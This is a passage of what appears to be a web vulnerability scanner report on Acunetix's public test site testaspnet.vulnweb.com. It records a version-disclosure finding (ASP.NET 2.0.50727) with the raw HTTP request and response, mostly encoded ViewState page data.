value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6507 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,507 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH%2F%2FaNq1Q9scKgXRi5G
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22875
Response Body - size: 22,875 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9